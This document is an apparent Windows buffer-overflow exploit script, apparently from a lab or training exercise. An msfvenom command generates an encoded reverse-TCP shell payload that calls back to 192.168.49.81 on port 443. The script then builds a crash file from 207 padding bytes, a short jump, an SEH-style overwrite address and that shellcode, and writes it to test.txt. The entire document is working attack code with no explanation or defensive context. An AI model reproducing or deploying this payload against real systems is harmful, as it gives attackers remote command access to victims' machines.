# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.49.81 -b "\x00\x09\x0a\x0d\x3a\x5c\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0e\x0f\x10" -v payload --smallest -f py  
payload =  b""  
payload += b"\x89\xe3\xdb\xd0\xd9\x73\xf4\x5b\x53\x59\x49\x49"  
payload += b"\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"  
payload += b"\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"  
payload += b"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"  
payload += b"\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
payload += b"\x69\x6c\x79\x78\x4c\x42\x43\x30\x53\x30\x33\x30"  
payload += b"\x51\x70\x6e\x69\x6b\x55\x30\x31\x69\x50\x61\x74"  
payload += b"\x6c\x4b\x36\x30\x56\x50\x4c\x4b\x50\x52\x76\x6c"  
payload += b"\x6e\x6b\x63\x62\x57\x64\x4c\x4b\x32\x52\x45\x78"  
payload += b"\x34\x4f\x58\x37\x32\x6a\x54\x66\x56\x51\x49\x6f"  
payload += b"\x6e\x4c\x45\x6c\x43\x51\x43\x4c\x74\x42\x34\x6c"  
payload += b"\x51\x30\x69\x51\x5a\x6f\x76\x6d\x35\x51\x68\x47"  
payload += b"\x4d\x32\x4c\x32\x32\x72\x33\x67\x4e\x6b\x62\x72"  
payload += b"\x64\x50\x6e\x6b\x71\x5a\x65\x6c\x6e\x6b\x70\x4c"  
payload += b"\x54\x51\x43\x48\x78\x63\x53\x78\x36\x61\x4a\x71"  
payload += b"\x46\x31\x4e\x6b\x30\x59\x35\x70\x65\x51\x49\x43"  
payload += b"\x4c\x4b\x50\x49\x34\x58\x59\x73\x47\x4a\x32\x69"  
payload += b"\x6c\x4b\x66\x54\x6c\x4b\x76\x61\x69\x46\x75\x61"  
payload += b"\x69\x6f\x6c\x6c\x69\x51\x5a\x6f\x64\x4d\x66\x61"  
payload += b"\x6f\x37\x66\x58\x39\x70\x63\x45\x49\x66\x64\x43"  
payload += b"\x73\x4d\x49\x68\x77\x4b\x51\x6d\x66\x44\x43\x45"  
payload += b"\x5a\x44\x51\x48\x6c\x4b\x56\x38\x37\x54\x76\x61"  
payload += b"\x7a\x73\x35\x36\x4e\x6b\x76\x6c\x30\x4b\x6c\x4b"  
payload += b"\x46\x38\x47\x6c\x56\x61\x58\x53\x6e\x6b\x74\x44"  
payload += b"\x6e\x6b\x45\x51\x38\x50\x6e\x69\x52\x64\x51\x34"  
payload += b"\x37\x54\x33\x6b\x31\x4b\x61\x71\x33\x69\x51\x4a"  
payload += b"\x62\x71\x49\x6f\x6b\x50\x31\x4f\x73\x6f\x33\x6a"  
payload += b"\x4c\x4b\x62\x32\x5a\x4b\x4e\x6d\x31\x4d\x63\x58"  
payload += b"\x55\x63\x55\x62\x43\x30\x73\x30\x73\x58\x33\x47"  
payload += b"\x44\x33\x76\x52\x61\x4f\x46\x34\x51\x78\x42\x6c"  
payload += b"\x34\x37\x54\x66\x57\x77\x79\x6f\x79\x45\x6e\x58"  
payload += b"\x6c\x50\x47\x71\x75\x50\x43\x30\x77\x59\x38\x44"  
payload += b"\x30\x54\x36\x30\x45\x38\x67\x59\x6b\x30\x70\x6b"  
payload += b"\x43\x30\x79\x6f\x59\x45\x52\x70\x50\x50\x30\x50"  
payload += b"\x42\x70\x33\x70\x56\x30\x61\x50\x72\x70\x53\x58"  
payload += b"\x4a\x4a\x76\x6f\x79\x4f\x79\x70\x59\x6f\x79\x45"  
payload += b"\x6d\x47\x32\x4a\x47\x75\x63\x58\x69\x50\x69\x38"  
payload += b"\x34\x71\x33\x61\x65\x38\x74\x42\x45\x50\x75\x51"  
payload += b"\x6f\x4b\x4e\x69\x38\x66\x31\x7a\x34\x50\x46\x36"  
payload += b"\x31\x47\x32\x48\x6d\x49\x49\x35\x51\x64\x45\x31"  
payload += b"\x79\x6f\x69\x45\x4d\x55\x4b\x70\x53\x44\x56\x6c"  
payload += b"\x49\x6f\x72\x6e\x46\x68\x64\x35\x78\x6c\x71\x78"  
payload += b"\x38\x70\x6d\x65\x79\x32\x42\x76\x49\x6f\x68\x55"  
payload += b"\x63\x58\x52\x43\x30\x6d\x75\x34\x33\x30\x6c\x49"  
payload += b"\x6a\x43\x63\x67\x52\x77\x33\x67\x50\x31\x79\x66"  
payload += b"\x30\x6a\x62\x32\x53\x69\x76\x36\x59\x72\x4b\x4d"  
payload += b"\x65\x36\x6b\x77\x43\x74\x46\x44\x37\x4c\x47\x71"  
payload += b"\x56\x61\x4e\x6d\x73\x74\x77\x54\x66\x70\x4a\x66"  
payload += b"\x33\x30\x43\x74\x30\x54\x70\x50\x51\x46\x76\x36"  
payload += b"\x36\x36\x51\x56\x30\x56\x30\x4e\x72\x76\x62\x76"  
payload += b"\x56\x33\x56\x36\x62\x48\x63\x49\x6a\x6c\x75\x6f"  
payload += b"\x4f\x76\x59\x6f\x49\x45\x4d\x59\x6d\x30\x52\x6e"  
payload += b"\x70\x56\x61\x56\x59\x6f\x44\x70\x35\x38\x53\x38"  
payload += b"\x6c\x47\x55\x4d\x61\x70\x6b\x4f\x79\x45\x4d\x6b"  
payload += b"\x7a\x50\x48\x35\x4d\x72\x43\x66\x50\x68\x6c\x66"  
payload += b"\x7a\x35\x4d\x6d\x6f\x6d\x59\x6f\x4b\x65\x65\x6c"  
payload += b"\x46\x66\x63\x4c\x55\x5a\x6b\x30\x6b\x4b\x6d\x30"  
payload += b"\x51\x65\x75\x55\x4f\x4b\x72\x67\x72\x33\x52\x52"  
payload += b"\x72\x4f\x63\x5a\x35\x50\x61\x43\x79\x6f\x39\x45"  
payload += b"\x41\x41"

#buffer = "A"*100000  
buffer =  b"A"*207  
buffer += b"\x90\x90\xeb\x04" # bp 0x61e4dab1; g  
buffer += b"\xb1\xda\xe4\x61"  
buffer += b"\x90"*2  
buffer += payload

with open("test.txt", 'wb') as out:  
    out.write(buffer)

Tag

#buffer_overflow